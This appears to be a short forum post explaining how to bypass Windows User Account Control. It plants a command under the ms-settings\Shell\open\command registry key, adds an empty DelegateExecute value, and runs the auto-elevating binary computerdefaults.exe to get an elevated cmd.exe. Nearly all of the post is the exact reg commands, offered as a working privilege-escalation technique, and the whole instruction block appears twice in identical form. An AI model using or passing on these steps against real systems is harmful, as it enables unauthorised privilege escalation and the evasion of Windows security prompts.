11-07-25, 01:03 AM
there is some windows legitimate binaries that you can take advantage of, m going to talk about computerdefaults.exe, one of living-off-the-land binaries (lolbins) which allows users to choose which programs are used by default. the binary will check two registry values at HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command, hijacking em allows your commands or scripts to run with elevated privileges and bypass UAC so lets start:
first we need to add the ms-settings\Shell\open\command registry key and set it to the desired script or command to run, in this example we will run cmd.exe so type this command in cmd
reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f
then create a an empty value there with the name "DelegateExecute" by typing reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /d "" /t REG_SZ /f
thats it, now all you have to is running computerdefaults.exe.
to clean the registry type reg delete HKEY_CURRENT_USER\Software\Classes\ms-settings /f
first we need to add the ms-settings\Shell\open\command registry key and set it to the desired script or command to run, in this example we will run cmd.exe so type this command in cmd
reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f
then create a an empty value there with the name "DelegateExecute" by typing reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /d "" /t REG_SZ /f
thats it, now all you have to is running computerdefaults.exe.
to clean the registry type reg delete HKEY_CURRENT_USER\Software\Classes\ms-settings /f
